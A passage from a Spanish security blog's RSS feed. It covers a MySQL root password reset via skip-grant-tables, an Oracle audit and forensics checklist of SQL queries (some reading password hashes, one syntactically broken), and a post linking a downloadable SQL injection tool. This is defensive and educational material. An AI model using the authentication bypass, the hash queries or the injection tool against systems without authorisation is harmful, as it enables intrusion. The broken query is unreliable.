href="http://www.dragonjar.org/tag/day" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Day">Day</a></strong></li><li>Realiza un fingerprint de nuestra aplicativo Web</li></ul><p>Si ZeroDayScan detecta algo en nuestro sitio Web, nos enviará vía correo electrónico, un completo informe con las vulnerabilidades encontradas, así como los pasos a seguir para corregirlas&#8230;.. y todo esto TOTALMENTE GRATIS.</p><p>Si tienes un sitio Web, es muy recomendable que utilices esta <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a>, para conocer el estado actual de la seguridad en tu pagina, posiblemente se demoren en enviarte el informe, pero es normal ya están procesando muchas solicitudes.</p><p><strong>Mas Información</strong><br
/> <a
href="http://www.zerodayscan.com/">Pagina Oficial del ZeroDayScan</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-desarrollo-seguro-aplicaciones-web-google.xhtml" title="Curso sobre desarrollo seguro de aplicaciones web por Google">Curso sobre desarrollo seguro de aplicaciones web por Google</a></li><li><a
href="http://www.dragonjar.org/x5s-encuentra-fallos-xss-lfi-y-rfi-facilmente.xhtml" title="X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente">X5S &#8211; Encuentra fallos XSS, LFI y RFI fácilmente</a></li><li><a
href="http://www.dragonjar.org/top-10-fallos-de-seguridad-en-aplicaciones-web.xhtml" title="TOP 10 Fallos de Seguridad en Aplicaciones Web">TOP 10 Fallos de Seguridad en Aplicaciones Web</a></li><li><a
href="http://www.dragonjar.org/multiples-vulnerabilidades-smf.xhtml" title="Multiples Vulnerabilidades en SMF">Multiples Vulnerabilidades en SMF</a></li><li><a
href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-fingerprint-escaneo-basico.xhtml" title="Video Tutorial Fingerprint y Escaneo Básico">Video Tutorial Fingerprint y Escaneo Básico</a></li><li><a
href="http://www.dragonjar.org/todos-los-videos-de-antichat-parte-i.xhtml" title="Todos los Vídeos de AntiChat &#8211; Parte I">Todos los Vídeos de AntiChat &#8211; Parte I</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/revisa-la-seguridad-de-tu-sitio-web-gratis.xhtml/feed</wfw:commentRss> <slash:comments>10</slash:comments> </item> <item><title>Como Recuperar Clave MySQL</title><link>http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml</link> <comments>http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml#comments</comments> <pubDate>Fri, 22 Jan 2010 05:57:04 +0000</pubDate> <dc:creator>Epsilon</dc:creator> <category><![CDATA[COMOs]]></category> <category><![CDATA[GNU/Linux]]></category> <category><![CDATA[Aplicacion]]></category> <category><![CDATA[Clave]]></category> <category><![CDATA[clave en]]></category> <category><![CDATA[clave mysql]]></category> <category><![CDATA[Contraseñas]]></category> <category><![CDATA[Datos]]></category> <category><![CDATA[mysql]]></category> <category><![CDATA[mysql clave]]></category> <category><![CDATA[Password]]></category> <category><![CDATA[Root]]></category> <category><![CDATA[Seguridad]]></category> <category><![CDATA[Servicio]]></category> <category><![CDATA[Servidores]]></category> <category><![CDATA[SQL]]></category> <category><![CDATA[usuario clave]]></category> <category><![CDATA[usuario contraseña]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3610</guid> <description><![CDATA[Una de las claves o password mas importante para todo administrador de sistemas y servidores, es la clave del usuario root de MYSQL.  Como todos sabemos lo ideal en cuanto a contraseñas es tener una diferente para cada cuenta,  esto nos ayuda  a incrementar un poco el nivel de seguridad, sin embargo, en algunas ocasiones [...]]]></description> <content:encoded><![CDATA[<p>Una de las claves o <a
href="http://www.dragonjar.org/tag/password" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Password">password</a> mas importante para todo administrador de sistemas y servidores, es la <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> del usuario root de MYSQL.  Como todos sabemos lo ideal en cuanto a <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> es tener una diferente para cada cuenta,  esto nos ayuda  a incrementar un poco el nivel de seguridad, sin embargo, en algunas ocasiones por culpa de la  memoria del ser humano o por otros motivos ajenos a la maquina, nadie se acuerda de la <a
href="http://www.dragonjar.org/tag/clave" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Clave">clave</a> maestra  de este importante <a
href="http://www.dragonjar.org/tag/servicio" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Servicio">servicio</a>. A simple vista  puede parecer un problema muy grave, no obstante, es algo que se puede resolver  de forma sencilla siempre y cuando tengamos acceso  al servidor con una cuenta de root, para restablecer la contraseña de mysql podemos hacer lo siguiente:</p><p
style="text-align: center;"><img
class="alignnone" title="Recuperar Clave de Mysql" src="http://farm5.static.flickr.com/4044/4293974865_b06a0f6975.jpg" alt="4293974865 b06a0f6975 Como Recuperar Clave MySQL" width="500" height="185" /></p><p><span
id="more-3610"></span></p><ol><li>Detenemos el servicio si se esta ejecutando:</li><blockquote><p><code>/etc/init.d/mysql  stop</code></p></blockquote><li>El siguiente paso es reiniciar el servidor MYSQL en modo seguro, con los siguientes parámetros:</li><blockquote><p><code>mysqld_safe --skip-grant-tables --skip-<a
href="http://www.dragonjar.org/tag/networking" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Networking">networking</a></code></p></blockquote><li>Ahora, en otra consola entramos como root al servidor, de esta forma:</li><blockquote><p><code>mysql -u root -p mysql</code></p></blockquote><li>Si todo ha salido bien, debemos tener  el prompt de Mysql, en el cual  procederemos a cambiar el password, en la tabla user de la base  de datos mysql:</li><blockquote><p><code>UPDATE user SET Password=PASSWORD('passwordnuevo') WHERE User='root';<br
/> flush privileges;</code></p></blockquote><li>Por ultimo solo basta  terminar el proceso de mysql-safe y reiniciar el servidor como se hace normalmente:</li><blockquote><p><code>pkill mysql -safe<br
/> /etc/init.d/mysql start</code></p></blockquote></ol><p>Cabe resaltar que  la mejor forma de evitarse este tipo de calamidades, es bueno recordar las contraseñas, en la red existen muchas <a
href="http://www.dragonjar.org/tag/aplicaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con aplicaciones">aplicaciones</a> las cuales nos ayudan a gestionar y administrar todas nuestras contraseñas, recuerda que en la comunidad hemos proporcionado siempre información útil para <a
title="Maneja tus Contraseñas de Forma Sencilla" rel="nofollow" href="../maneja-tus-contrasenas-de-forma-sencilla.xhtml" target="_blank">maneja tus contraseñas fácilmente</a>, <a
title="herramientas" rel="nofollow" href="../tag/herramientas" target="_blank">herramientas</a> para <a
title="Enlace permanente a PassPub, Generador de Contraseñas Seguras" rel="bookmark" href="../passpub-generador-de-contrasenas-seguras.xhtml">generar   contraseñas seguras</a>, e incluso aplicaciones que si no quieres utilizar una palabra clave, te permiten <a
rel="nofollow" href="../proteccion-biometrica-al-alcance-de-todos.xhtml" target="_blank">utilizar tu rostro como contraseña</a> para que nunca pierdas una clave y no te toque recurrir a procedimientos como este.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/los-peores-passwords-en-espanol.xhtml" title="Las peores Contraseñas en Español">Las peores Contraseñas en Español</a></li><li><a
href="http://www.dragonjar.org/malas-contrasenas-para-utilizar.xhtml" title="Las Peores 500 Contraseñas de Todos los Tiempos">Las Peores 500 Contraseñas de Todos los Tiempos</a></li><li><a
href="http://www.dragonjar.org/cambia-tu-clave-maestra-en-lastpass.xhtml" title="Cambia tu clave maestra en LastPass">Cambia tu clave maestra en LastPass</a></li><li><a
href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a
href="http://www.dragonjar.org/resetear-password-de-root.xhtml" title="Resetear Password de Root">Resetear Password de Root</a></li><li><a
href="http://www.dragonjar.org/generador-diccionarios-passwords.xhtml" title="CeWL &#8211; Generador de Diccionarios Personalizados">CeWL &#8211; Generador de Diccionarios Personalizados</a></li><li><a
href="http://www.dragonjar.org/como-configurar-ldap-en-ubuntu-server-o-debian.xhtml" title="Cómo configurar LDAP en Ubuntu Server o Debian">Cómo configurar LDAP en Ubuntu Server o Debian</a></li><li><a
href="http://www.dragonjar.org/1234-y-password-son-las-contrasenas-utilizadas-en-usa.xhtml" title="&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA">&#8220;1234&#8243; y &#8220;password&#8221; son las Contraseñas + Utilizadas en USA</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml/feed</wfw:commentRss> <slash:comments>7</slash:comments> </item> <item><title>¿Que Mirar Cuando Auditamos una Base de Datos Oracle?</title><link>http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml</link> <comments>http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml#comments</comments> <pubDate>Fri, 13 Nov 2009 08:39:23 +0000</pubDate> <dc:creator>D7n0s4ur70</dc:creator> <category><![CDATA[Artículos sobre seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[Auditoria]]></category> <category><![CDATA[Base de Datos]]></category> <category><![CDATA[Oracle]]></category> <category><![CDATA[Server]]></category> <category><![CDATA[sistema]]></category> <category><![CDATA[SQL]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=3336</guid> <description><![CDATA[Cuando se realiza una auditoria, siempre es recomendable seguir una serie de pasos para no pasar por algo ningún detalle que pueda resultar crucial para nuestra investigación, a continuación les dejo un pequeño listado de las cosas a las que debemos echarle una ojeada cuando auditamos una base de datos oracle. 1). Determinar si en [...]]]></description> <content:encoded><![CDATA[<p>Cuando se realiza una <a
href="http://www.dragonjar.org/tag/auditoria" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Auditoria">auditoria</a>, siempre es recomendable seguir una serie de pasos para no pasar por algo ningún detalle que pueda resultar crucial para nuestra investigación, a continuación les dejo un pequeño listado de las cosas a las que debemos echarle una ojeada cuando auditamos una <a
href="http://www.dragonjar.org/tag/base-de-datos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Base de Datos">base de datos</a> <a
href="http://www.dragonjar.org/tag/oracle" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Oracle">oracle</a>.</p><p
style="text-align: center;"><img
src="http://farm3.static.flickr.com/2476/4100282916_b0e4fe2de0_o.jpg" alt="4100282916 b0e4fe2de0 o ¿Que Mirar Cuando Auditamos una Base de Datos Oracle?"  title="¿Que Mirar Cuando Auditamos una Base de Datos Oracle?" /></p><p><strong>1).</strong> Determinar si en la BD esta activo el modo de operación en ARCHIVELOG o NONARCHIVELOG. Si este no esta activo, la evidencia de ataque o cambios serán sobrescritos por un nuevo redo.</p><p>Se puede determinar realizando una sentencia <a
href="http://www.dragonjar.org/tag/sql" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SQL">SQL</a> a la BD:</p><ul><li>SELECT VALUE V$PARAMETER WHERE FROM NAME=&#8217;archiv_log_start&#8217;;</li></ul><p><strong><span
id="more-3336"></span>2).</strong> Análisis de los Oracle Data Blocks, para determinar:</p><ul><li>Registros eliminados</li><li>Localizar bloques asignados a tablas (OBJETOS DE INTERÉS)</li><li>Seguimiento de Objetos creados y eliminados</li><li>Localización de tablas eliminadas</li><li>Localización de Funciones eliminadas</li></ul><p><strong>3).</strong> Obtención del SID de la BD</p><p><strong>4).</strong> Enumeración de usuarios</p><ul><li> SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li><li> SELECT USERID, COMMENT$TEXT FROM SYS.AUD$;</li></ul><p><strong>5).</strong> Consultar <a
href="http://www.dragonjar.org/tag/ataques" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Ataques">Ataques</a> de Fuerza bruta o Diccionario a cuentas de usuario</p><ul><li>SQL&gt; SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li><li>SELECT NAME, LCOUNT FROM USER$ WHERE LCOUNT&gt;0;</li><li>SELECT NAME, LTIME FROM USER$ WHERE ASTATUS = 4;</li></ul><p><strong>6).</strong> Consulta de Ataques de Fuerza Bruta a la cuenta SYS</p><p><strong>7).</strong> Consulta de intentos del exploit AUTH_ALTER_SESSION</p><ul><li>SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li></ul><p><strong>8).</strong> Consulta de intentos de iniciar una sesiÛn la base de datos a travÈs de XML (XDB)</p><ul><li>SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li><li>SELECT COMMENT$TEXT FROM SYS.AUD$ WHERE USERID = &#8216;DBSNMP&#8217;;</li><li>SELECT TERMINAL,SPARE1,TIMESTAMP# FROM SYS.AUD$ WHERE USERID=&#8217;DBSNMP&#8217;;</li></ul><p><strong>9).</strong> Consulta si la Auditoria esta habilitada</p><ul><li> SELECT USER_ID, SESSION_ID, SAMPLE_TIME FROM SYS.WRH$_ACTIVE_SESSION_HISTORY ORDER BY SAMPLE_TIME;</li><li>SELECT USERID, ACTION#, RETURNCODE, TIMESTAMP# FROM SYS.AUD$;</li><li>SELECT USERID,ACTION#,TIMESTAMP#,LOGOFF$TIME FROM AUD$;</li></ul><p><strong>10).</strong> Consulta del archivo sqlnet.log,Agntsrvc.log, spfilesid.ora, o el init.ora todas las ubicaciones referentes a estos parámetros:</p><ul><li>audit_file_dest        &#8212;&#8212;-&gt; <a
href="http://www.dragonjar.org/tag/sistema" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con sistema">Sistema</a> de Auditoria (ORACLE_HOME/rdbms/audit)</li><li>background_dump_dest    &#8212;&#8212;-&gt; archivo alert.log y tracer de procesos ($ORACLE_HOME/admin/$ORACLE_SID/bdump)</li><li>core_dump_dest        &#8212;&#8212;-&gt; archivos Oracle core dump ($ORACLE_HOME/DBS/)</li><li>db_recovery_file_dest    &#8212;&#8212;-&gt; redo logs, flashback logs, y RMAN backups</li><li>user_dump_dest        &#8212;&#8212;-&gt; Archivos trace debuggin procesos/usuarios (/oracle/utrc)</li><li>utl_file_dir        &#8212;&#8212;-&gt; Especifica uno o m·s directorios que Oracle debe utilizar para PL/SQL archivos E/S.</li><li>control_files        &#8212;&#8212;-&gt; Especifica uno o varios nombres de archivos de control de Oracle</li><li>db_create_file_dest    &#8212;&#8212;-&gt; Especifica la ubicación predeterminada de archivos de datos administrados por Oracle.</li><li>db_create_online_log_dest_n&#8212;-&gt; Especifica la ubicación de los redo logs y file control</li><li>log_archive_dest    &#8212;&#8212;-&gt; Es aplicable solo si la BD esta en modo de ARCHIVELOG</li><li>log_archive_dest_n    &#8212;&#8212;-&gt; Define hasta 10 archivos de registros logs.</li></ul><p><strong>11).</strong> Consulta de archivos Log Listener (ORACLE_HOME/network/admin/listener.ora) (lsnrctl status me dara la ubicación actual)</p><p><strong>12).</strong> Revisión de los LOGS de sentencias(SQL $ORACLE_HOME/bin/LOGIN.SQL,$ORACLE_HOME/dbs/LOGIN.SQL,$ORACLE_HOME/SQLPlus/admin/glogin.sql)</p><p><strong>13).</strong> Consultando informacion de los inicios de Sesion:</p><ul><li>SELECT USER_ID, SESSION_ID, SAMPLE_TIME FROM SYS.WRH$_ACTIVE_SESSION_HISTORY</li></ul><p><strong>14).</strong> Consultar una lista de usuarios y roles, usuarios con función de DBA, para buscar inconsistencias,o usuarios creados por un atacante y la generación de <a
href="http://www.dragonjar.org/tag/contrasenas" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Contraseñas">contraseñas</a> fuertes con la validación de los hash, cuentas bloqueadas, tiempos de password</p><ul><li>SELECT USER#, NAME, ASTATUS, PASSWORD, CTIME, PTIME, LTIME FROM SYS.USER$ WHERE TYPE#=1;</li><li>SELECT U.NAME AS &#8220;GRANTEE&#8221;, U2.NAME AS &#8220;ROLE&#8221; FROM SYS.USER$ U,SYS.USER$ U2, SYS.SYSAUTH$ A WHERE U.USER# = A.GRANTEE# AND PRIVILEGE# = U2.USER#;</li></ul><p><strong>15).</strong> Consultar una lista de objetos y privilegios en el sistema</p><ul><li>SELECT U.NAME AS &#8220;GRANTEE&#8221;, P.NAME AS &#8220;PRIVILEGE&#8221;, U2.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;OBJECT&#8221; FROM SYS.USER$ U, SYS.USER$ U2,SYS.TABLE_PRIVILEGE_MAP P, SYS.OBJ$ O, SYS.OBJAUTH$ A WHERE U.USER# =A.GRANTEE# AND A.OBJ# = O.OBJ# AND P.PRIVILEGE = A.PRIVILEGE# AND O.OWNER#=U2.USER#;</li><li>SQL&gt; SELECT OBJ#, OWNER#, NAME, TYPE#, CTIME, MTIME, STIME FROM SYS.OBJ$ ORDER BY CTIME ASC;</li></ul><p><strong>16).</strong> Consulta de tablas eliminadas</p><ul><li>SELECT U.NAME, R.ORIGINAL_NAME, R.OBJ#, R.DROPTIME, R.DROPSCN FROM SYS.RECYCLEBIN$ R, SYS.USER$ U WHERE R.OWNER#=U.USER#;</li></ul><p><strong>17).</strong> Consulta de Directorios, archivos datos, archivos externos, tablas externas, buscando elementos perdidos o ubicados en sitios diferentes por el atacante.</p><ul><li>SELECT T.NAME AS &#8220;TABLESPACE&#8221;, D.NAME AS &#8220;FILNAME&#8221; FROM V$DATAFILE D, TS$ T WHERE T.TS#=D.TS#;<br
/> SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;DIRECTORY&#8221;, D.OS_PATH AS &#8220;PATH&#8221; FROM SYS.OBJ$ O, SYS.USER$ U, SYS.DIR$ D WHERE U.USER#=O.OWNER# AND O.OBJ#=D.OBJ#;</li><li>SELECT O.NAME, D.DEFAULT_DIR FROM SYS.OBJ$ O, SYS.EXTERNAL_TAB$ D WHERE D.OBJ# = O.OBJ#;</li></ul><p><strong>18).</strong> El Monitor del Sistema (SMON) MON_MOD$ Table</p><ul><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;OBJECT&#8221;, M.OBJ#, M.INSERTS,M.UPDATES, M.DELETES, M.TIMESTAMP FROM SYS.MON_MODS$ M, SYS.USER$ U,SYS.OBJ$ O WHERE O.OBJ#=M.OBJ# AND U.USER#=O.OWNER#;</li></ul><p><strong>19).</strong> Revision de Triggers al encendido, apagado, inicio y terminacion de sesion</p><ul><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221;,DECODE(T.TYPE#, 0, &#8216;BEFORE&#8217;,2, &#8216;AFTER&#8217;,'NOTSET&#8217;) AS &#8220;WHEN&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1;</li><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,1) = 1;</li><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,2) = 2;</li><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,8) = 8;</li><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;ENABLED_TRIGGER_NAME&#8221; FROM SYS.OBJ$ O, SYS.TRIGGER$ T, SYS.USER$ U WHERE O.OBJ#=T.OBJ# AND O.OWNER# = U.USER# AND ENABLED=1 AND BITAND(T.SYS_EVTS,16) = 16;</li></ul><p><strong>20).</strong> Consulta de librerias, que puedan estar ejecutando codigo arbitrario(malicioso)</p><ul><li>SELECT U.NAME AS &#8220;OWNER&#8221;, O.NAME AS &#8220;LIBRARY&#8221;, L.FILESPEC AS &#8220;PATH&#8221; FROM SYS.LIBRARY$ L, SYS.USER$ U, SYS.OBJ$ O WHERE O.OBJ#=L.OBJ# AND O.OWNER#=U.USER#;</li></ul><p><strong>21).</strong> Consultas de FlashBack (nuevos privilegios, derechos asignados, nuevos objetos, objetos eliminados) entre la tabla actual y la anterior en un tiempo determinado.</p><ul><li>SELECT GRANTEE#, PRIVILEGE# FROM SYS.SYSAUTH$ MINUS SELECT GRANTEE#, PRIVILEGE# FROM SYS.SYSAUTH$ AS OF TIMESTAMP(SYSDATE &#8211; INTERVAL &#8217;3600&#8242; MINUTE);</li><li>SELECT NAME FROM SYS.OBJ$ MINUS SELECT NAME FROM SYS.OBJ$ AS OF TIMESTAMP(SYSDATE &#8211; INTERVAL &#8217;156&#8242; MINUTE);</li><li>SELECT NAME FROM SYS.OBJ$ AS OF TIMESTAMP(SYSDATE &#8211; INTERVAL &#8217;156&#8242; MINUTE) MINUS SELECT NAME FROM SYS.OBJ$;</li></ul><p><strong>22).</strong> Consulta de las tablas RECYLEBIN$ y OBJ$</p><ul><li>SQL&gt; SELECT MTIME, NAME, OWNER#, OBJ# FROM SYS.OBJ$ WHERE NAME LIKE &#8216;BIN$%&#8217;;</li></ul><p><strong>23).</strong> Consultas la Administracion automatica Deshacer ( UNDOTBS01.DBF)</p><ul><li>SELECT SEGMENT_NAME,HEADER_FILE,HEADER_BLOCK,EXTENTS,BLOCKS FROM DBA_SEGMENTS WHERE SEGMENT_NAME LIKE &#8216;_SYSSMU%$&#8217;;</li></ul><p><strong>24).</strong> Consulta de los logs del Apache (Oracle Application <a
href="http://www.dragonjar.org/tag/server" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Server">Server</a>)</p><p><strong>25). </strong>¿faltó algo? háznoslo saber en los comentarios.</p><p><strong>Actualizado:</strong><br
/> El usuario coco, <a
href="http://www.megaupload.com/?d=A7ATMXMD">nos comparte una serie de scripts que utiliza en su trabajo para auditar su base de datos oracle</a>, puedes basarte en ellos para auditar tu propia DB de oracle.</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/seguridad-informatica-un-reto-para-la-ingenieria-del-software-o-una-necesidad.xhtml" title="Seguridad Informática, un reto para la Ingeniería del Software o una necesidad">Seguridad Informática, un reto para la Ingeniería del Software o una necesidad</a></li><li><a
href="http://www.dragonjar.org/nueva-clase-de-vulnerabilidad-en-bases-de-datos-sql.xhtml" title="Nueva Clase de Vulnerabilidad en Bases de Datos SQL">Nueva Clase de Vulnerabilidad en Bases de Datos SQL</a></li><li><a
href="http://www.dragonjar.org/curso-gratis-de-seguridad-y-redes-en-el-sena-virtual.xhtml" title="Curso Gratis de Seguridad y Redes en el Sena Virtual">Curso Gratis de Seguridad y Redes en el Sena Virtual</a></li><li><a
href="http://www.dragonjar.org/wifiway-2-0-1.xhtml" title="WifiWay 2.0.3 FINAL">WifiWay 2.0.3 FINAL</a></li><li><a
href="http://www.dragonjar.org/laboratorio-practico-de-auditoria-y-pentest.xhtml" title="Laboratorio Práctico de Auditoria y Pentest">Laboratorio Práctico de Auditoria y Pentest</a></li><li><a
href="http://www.dragonjar.org/presentacion-conceptos-basicos-seguridad-web.xhtml" title="Presentación de conceptos básicos en Seguridad Web">Presentación de conceptos básicos en Seguridad Web</a></li><li><a
href="http://www.dragonjar.org/dll-hijacking-con-metasploit.xhtml" title="DLL Hijacking con Metasploit">DLL Hijacking con Metasploit</a></li><li><a
href="http://www.dragonjar.org/repositorio-con-herramientas-de-seguridad.xhtml" title="Repositorio con Herramientas de Seguridad">Repositorio con Herramientas de Seguridad</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/lista-de-tareas-auditar-db-oracle.xhtml/feed</wfw:commentRss> <slash:comments>6</slash:comments> </item> <item><title>Código Fuente Herramienta para SQL Injection</title><link>http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml</link> <comments>http://www.dragonjar.org/codigo-fuente-herramienta-para-sql-injection.xhtml#comments</comments> <pubDate>Wed, 28 Jan 2009 19:53:18 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Seguridad Web]]></category> <category><![CDATA[.NET]]></category> <category><![CDATA[2009]]></category> <category><![CDATA[Basic]]></category> <category><![CDATA[Código Fuente]]></category> <category><![CDATA[Descargar]]></category> <category><![CDATA[SQL]]></category> <category><![CDATA[Visual]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=1929</guid> <description><![CDATA[Jbyte un usuario de nuestra comunidad, ha liberado el Código fuente de SqlInyection Tools, una herramienta basica para realizar sql injection. El código fuente esta escrito en Visual Basic .NET 2005, pueden modificar el codigo y aumentar sus funcionalidades. Descargar Codigo Fuente de Herramienta para SQL Injection. Password: www.dragonjar.org Mas Información: SqlInyection Tools JDA version [...]]]></description> <content:encoded><![CDATA[<p><strong><a
title="Ver perfil de Jbyte" href="http://comunidad.dragonjar.org/profiles/jbyte-u2056.html">Jbyte</a></strong> un usuario de nuestra comunidad, ha liberado el <a
href="http://comunidad.dragonjar.org/codigo_fuente_de_sqlinyection_tools_jda_v10beta_by_jbyte_version_2009-t2144.0.html;msg9824#msg9824">Código fuente</a> de <a
href="http://comunidad.dragonjar.org/sqlinyection_tools_jda_v10beta_by_jbyte_version_2009-t2113.0.html">SqlInyection Tools</a>, una <a
href="http://www.dragonjar.org/tag/herramienta" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Herramienta">herramienta</a> basica para realizar <a
href="http://www.dragonjar.org/tag/sql" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SQL">sql</a> <a
href="http://www.dragonjar.org/tag/injection" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Injection">injection</a>.</p><p
style="text-align: center;"><a
href="http://img102.imageshack.us/img102/4404/sqlinjectionly6.png"><img
class="aligncenter" src="http://img102.imageshack.us/img102/4404/sqlinjectionly6.th.png" border="0" alt="sqlinjectionly6.th Código Fuente Herramienta para SQL Injection  "  title="Código Fuente Herramienta para SQL Injection  " /></a></p><p>El <a
href="http://www.dragonjar.org/tag/codigo-fuente" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Código Fuente">código fuente</a> esta escrito en <a
href="http://www.dragonjar.org/tag/visual" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Visual">Visual</a> <a
href="http://www.dragonjar.org/tag/basic" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Basic">Basic</a> <a
href="http://www.dragonjar.org/tag/net" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con .NET">.NET</a> 2005, pueden modificar el codigo y aumentar sus funcionalidades.<span
id="more-1929"></span></p><h2 style="text-align: center;"><a
href="http://www.4shared.com/file/83133065/b8ed6cf/SqlInyector.html">Descargar Codigo Fuente de Herramienta para SQL Injection.</a></h2><p
style="text-align: center;"><span
style="color: #ff0000;"><a
href="http://www.dragonjar.org/tag/password" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Password">Password</a>:</span> www.dragonjar.org</p><p><strong>Mas Información:</strong><br
/> <a
href="http://comunidad.dragonjar.org/sqlinyection_tools_jda_v10beta_by_jbyte_version_2009-t2113.0.html;msg9630#msg9630">SqlInyection Tools  JDA version 2009</a><br
/> <a
href="http://comunidad.dragonjar.org/codigo_fuente_de_sqlinyection_tools_jda_v10beta_by_jbyte_version_2009-t2144.0.html;msg9824#msg9824">Código fuente de SqlInyection Tools JDA version 2009</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/creando-un-joiner-en-visual-basic.xhtml" title="Creando un Joiner en Visual Basic">Creando un Joiner en Visual Basic</a></li><li><a
href="http://www.dragonjar.org/codigo-fuente-para-sistemas-de-matriculas-ventas-biblioteca-odontologia-administracion-de-autos-en-net-2.xhtml" title="Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET">Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET</a></li><li><a
href="http://www.dragonjar.org/codigo-fuente-para-sistemas-de-matriculas-ventas-biblioteca-odontologia-administracion-de-autos-en-net.xhtml" title="Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET ">Código fuente para Sistemas de Matriculas, Ventas, Biblioteca, Odontología, Administración de Autos en .NET </a></li><li><a
href="http://www.dragonjar.org/nmap-5-0.xhtml" title="NMap 5.50">NMap 5.50</a></li><li><a
href="http://www.dragonjar.org/backtrack-5-r1.xhtml" title="BackTrack 5 R1">BackTrack 5 R1</a></li><li><a
